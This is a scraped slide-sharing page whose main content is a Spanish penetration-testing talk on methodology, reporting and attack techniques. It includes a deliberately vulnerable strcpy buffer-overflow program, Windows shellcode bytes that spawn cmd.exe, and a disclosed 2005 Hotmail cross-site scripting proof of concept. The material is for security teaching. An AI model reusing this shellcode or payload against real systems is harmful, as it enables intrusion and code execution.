Tecnicas avanzadas de ocultamiento de malware
Tecnicas avanzadas de ocultamiento de malwareTecnicas avanzadas de ocultamiento de malware
Tecnicas avanzadas de ocultamiento de malware
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores Dedicados
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Hacking Drupal - Anatomía de una auditoría de seguridad
Hacking Drupal - Anatomía de una auditoría de seguridadHacking Drupal - Anatomía de una auditoría de seguridad
Hacking Drupal - Anatomía de una auditoría de seguridad
 
Seguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD ModeSeguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD Mode
 
Ponencia sql avanzado y automatizado
Ponencia sql avanzado y automatizadoPonencia sql avanzado y automatizado
Ponencia sql avanzado y automatizado
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPS
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos
 
LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]
LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]
LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]
 
Más responsabilidad y seguridad en tus datos
Más responsabilidad y seguridad en tus datosMás responsabilidad y seguridad en tus datos
Más responsabilidad y seguridad en tus datos
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
 

Dernier

Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son241514984
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..RobertoGumucio2
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 

Dernier (20)

Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptx
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 

Pentest - El Arte de la Guerra

  • 1.
  • 2. 1. 20 Min: Que es un Pentest? 2. 40 Min: Be a Lulzsec guy for a while!!!! 3. 60 Min: Better than anonymous!!!. 4. 20 Min: Preguntas y respuestas.
  • 3. 1. RIESGOS DE LA SEGURIDAD CORPORATIVA 2. PRUEBAS DE PENETRACION 3. TIPOS DE PRUEBAS 4. ESTRUCTURA DE UN PENTEST 5. TECNICAS BASICAS DE HACKEO 6. HACKING !!!!! 7. CONCLUSIONES
  • 4. PROBLEMAS • En la experiencia general el 98% de las empresas son muy vulnerables a ataques simples, el 2 % restante son vulnerables a ataques especializados. • El mismo numero 98% desconoce la forma de pensar y las técnicas usadas por los atacantes. • En la actualidad el hacking ha crecido mas como una actividad delictiva y enfocada a ciertos blancos. • El hacker tiene todo el tiempo que desee para buscar la forma de atacar y solo tiene que encontrar 1 error, el CSO tiene muchas responsabilidades y verificar cada paso y proceso tecnológico y solo tiene que cometer 1 error. RIESGOS • Reputación, perdida de confianza e imagen. • Perdida o modificación de datos. • Incumplimiento de regulaciones (SOX, CNBV, LFPDPPP, etc.) • Robo de identidad o datos sensibles (Datos Identificables, Crediticios, Patrimoniales, etc.) • Espionaje industrial. • Muchos Otros…
  • 5. OBJETIVOS • En las prueba de penetración se actúa como atacante malicioso, tomándose el tiempo necesario de buscar todas las vulnerabilidades posibles, para preparar y evaluar la empresa para resistir ataques comunes y dirigidos. FINALIDAD • Lograr el acceso con el máximo privilegio posible a través de conocimientos técnicos avanzados con un equipo multidisciplinario (Tiger Teaming), a datos privados y sensibles, apoyando con soluciones para permitir minimizar el riesgo y determinar las posibilidades reales de un ataque. REQUERIMIENTOS PARA EL CONSULTOR • Conocimiento de redes. • Conocimiento de sistemas operativos. • Conocimiento de desarrollo. • Conocimiento de ingeniería en reversa. • Conocimiento de herramientas. • Conocimiento de °!#$#&&/&()&))==?((#234
  • 6. GENERAL (EXTERNA O INTERNA) • WHITE BOX • Con el conocimiento de la infraestructura. • Tiene menos riesgos pues se sabe que sistemas atacar y por donde. • GREY BOX • Conocimiento parcial de la infraestructura. • Tienes riesgos bajos ya que abra que hacer intentos de prueba y error. • BLACK BOX • Sin conocimiento alguno de la infraestructura. • Implica un riesgo alto, ya que no solo alentar las comunicaciones por el trafico a generarse al hacer trabajo intenso de búsquedas, si no que también corre riesgos al poder detener la producción completa de una empresa con ataques no esperados. ESPECIALIZADA • Web Application Penetration Test. • Application Vulnerability Assessment. • Source Code Security Analysis. • Wi-Fi Penetration Testing • Social Engineering. • Physical Security. • Industrial Espionage. • Vulnerability Assessment.
  • 7. Existen diversas metodologías de seguridad a seguir: • Open Source Security Testing Methodology Manual (OSSTMM) • Open Web Application Security Project (OWASP) • National Institute of Standards and Technology-SP800-115 (NIST) • Information Systems Security Assessment Framework (ISSAF) Que se hace en un Pentest? 1.- Objetivos 2.- Recopilación 3.- Enumeración •Establecer metas. •Google, DNS, Footprint. •Port Scanning, Vuln Scan •Establecer blancos. •Social Engineering. •Services & Applications •Detectar necesidades •Metadatos (Archivos) •Users & Groups 4.- Explotación 5.- Documentación 6.- Dark Side Hacker •System Hacking •Executive Summary •Root kits, Key loggers •Evidence •Technical Details •Evidence Cleaning •Physical Intrusion •Recommendations •Access Concession
  • 8. Que debe contener un reporte de un Pen Test: • Introduction • Testing Team Details (Names, Contacts, Expertise) • Client Details (Details: network, servers, workstations, AD) • Scope of Testing • Purpose & Type (Assessment, New Implementation, Compliance, Security Pen Test) • Category (White box, Black Box, Grey Box) • Executive Summary (Brief) • Security Issues (With Critical level) • OS • Exploited & Unexploited • Application & Web • Exploited & Unexploited • Physical (Facilities) • Exploited & Unexploited • Personnel (Social Engineering) • Exploited & Unexploited • General • Exploited & Unexploited • Technical Summary • OS Security, Web Security, Database Security, Application Security, Business Security , Policies and Procedures • Risk & Recommendations
  • 9. "You don't know the power of the dark side!" -Darth Vader
  • 10. DOS, DDOS  Man in The Middle • Buffer Overflows – ARP Poisoning – Stack Overflows – SMB Relay – Heap Overflows – HTTPS y SSH Relay – Smashing the Stack – Adjacent Memory  Wireless Hacking – Off by One  Parameter Tampering  Information Disclosure  Race Conditions  Landscape Discovery  Format Strings – Portscanning  Double Frees – Banner Grabing  Null Sessions – Service Discovery  Spoofing  Sniffing  Virus & Cracking  Zapping – Worms  Brute Forcing – Backdoors  Web – Caballos de Troya – Sql Injections – Debugging – XXS Cross Scripting Site – Dissasembling – Session Hijacking – Unpacking – Cookie hijacking &poisoning – PHP/ASP File Inclusion – PHP/ASP Includes  Steganografia – PHP/ASP Null Byte  Alternate Data Streams (file systems) – PHP Global Vars  Email Hacking – Alternate Data Stream – Frame Relay – Google Hacking – Identity Thief
  • 11. PHP/ASP  Inclusión de Archivos  Archivos de Backup (.BAK .INC ETC)  Inyección de código PHP  Errores de Configuración  Mala Técnica de Programación  SQL Injection  Cross Site Scripting
  • 13. Definición – Insertar datos mas grandes que el máximo alocado en memoria, dando esto en el cambio de flujo del programa ya sea por corrupción del Extended Instruction Pointer (EIP) o funciones corruptas (Heap) • Porque Existen los BO – La forma en que la creación de sistemas operativos se enseña provee una optimización de lectura y escritura en la memoria, por lo cual es espacio se aloca de izquierda a derecha y se escribe en forma inversa. – Cada ves que un programa ejecuta una rutina el sistema operativo hace lo siguiente: • Guardar la dirección de la siguiente instrucción valida en EIP (4 Bytes, 0x77777777) • Guardar la dirección de las variables dentro de un puntero en EBP (4 Bytes, 0x77777777) • Alocar espacio para las variables de la función que se esta llamando (Depende del Buffer) • Una ves terminada la función, se llama al código que punta EIP (Valor guardado) • Y así sucesivamente……. – Por lo que si tomamos control de EIP, podemos decir que al terminar la función el programa ejecute como siguiente código lo que el hacker quiera.
  • 14. #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buffer[20]; strcpy(buffer, argv[1]); printf("%sn", buffer); } 0xC0000005 0x45DF33AD 0x65D537AB NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.
  • 15. Técnicas Básicas:  Jump Into the Stack (la mas común utilizada en Linux)  Consiste en saltar directamente al payload o shellcode.  Call Jump Stack (La mas común utilizada en Windows)  Consiste en saltar a una dirección estática de memoria que a su ves apunta a la direccion de nuestro payload o shellcode 0xC0000005 0x41414141 0x41414141 “AAAAAAAAAAAAAAAAAAAAAAAAAA” Dirección de la escritura en la memoria. NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.
  • 16. System(cmd.exe) “x55x8BxECx33xFFx57x83xECx08xC6x45xF8x63xC6x45xF9x6DxC6x45xFAx64xC6x45xFBx2ExC6x45xFCx65xC6x45xFDx78xC6x4 5xFEx65x8Dx45x F8Xbbx44x80xBFx77xFFxD3” System(cmd.exe) 0040B4EC |. 55 PUSH EBP # Aquí empieza nuestra shellcode 0040B4ED |. 8BEC MOV EBP,ESP 0040B4EF |. 33FF XOR EDI,EDI 0040B4F1 |. 57 PUSH EDI 0040B4F2 |. 83EC 08 SUB ESP,8 0040B4F5 |. C645 F8 63 MOV BYTE PTR SS:[EBP-8],63 # ”C” 0040B4F9 |. C645 F9 6D MOV BYTE PTR SS:[EBP-7],6D # ”M” 0040B4FD |. C645 FA 64 MOV BYTE PTR SS:[EBP-6],64 # ”D” 0040B501 |. C645 FB 2E MOV BYTE PTR SS:[EBP-5],2E # ”.” 0040B505 |. C645 FC 65 MOV BYTE PTR SS:[EBP-4],65 # ”E” 0040B509 |. C645 FD 78 MOV BYTE PTR SS:[EBP-3],78 # ”X” 0040B50D |. C645 FE 65 MOV BYTE PTR SS:[EBP-2],65 # ”E” 0040B511 |. 8D45 F8 LEA eax,DWORD PTR SS:[EBP-8] #”CMD.EXE” 0040B514 |. 50 PUSH eax 0040B515 |. BB 4480BF77 MOV EBX, 76FDAB6B # Direccion del system() msvcrt.dll VISTA ESPAÑOL 0040B51A |. FFD3 CALL EBX # EJECUTA SYSTEM CON CMD.EXE DE PARAMETRO
  • 18. Si no conoces hackers y no sabes como romper y atacar sistemas, como esperas defenderte de ello? No es ser un genio, es solo el gusto de aprender. Ya no hay investigación ni desarrollo, se necesita mas gente interesada La mayoría de los avances tecnológicos han sido gracias a los hackers. Los consultores de seguridad están prostituidos, cuantos realmente saben hacer exploits y son buenos técnicamente y cuantos, solo tienen el titulo o la certificación por saber usar herramientas ya hechas. (ósea nada nuevo) SQL Injection = Lulzsec & anonymous
  • 19. De: Microsoft Security Response Center  Fallos XXS Hackeando Hotmail 26 de Abril 2005 [mailto:secure@microsoft.com]  Hotmail Cross Site Message Explore Enviado el: miércoles, 07 de septiembre de 2005 11:17 Para: Luis A. Cortes Zavala CC: Microsoft Security Response Center Proof of Concept Asunto: RE: failure notice [MSRC 5937sd] Hotmail Cross Site Message Explorer by NaPa Security Nation Labs – México Thanks for the fast reply Luis, ----------------------------------------------------------------- <html> OK no problems I will provide you with an update <head> </head> when the team turns on the "a" attribute at the end <body> of October. <script> str1=document.URL; str2=str1.split("?"); Its something we have difficulty with acknowledging str3=str2[1]; finders for our online services, as we don't issue a str4=str3.split("&"); security bulletin for them. str5="http://by17fd.bay17.hotmail.msn.com/cgibin/ getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid="; str6=str4[2]; I apologize for this, maybe once this is all over you str7=str6.split("="); can present at any conference and discuss this issue str8=str7[1]; str9="&msgread=&etype=&wo="; and how we went from a bad situation to a great str10=str5+str8+str9+"&"+str4[0]+"&"+str4[1] outcome and you were the researcher the whole window.open(str10); way along who worked with Microsoft to secure its </script> hola napa online systems? I don't know I am just thinking </body> aloud... </html> --------------------------------------------------------------------- Cheers Scott D.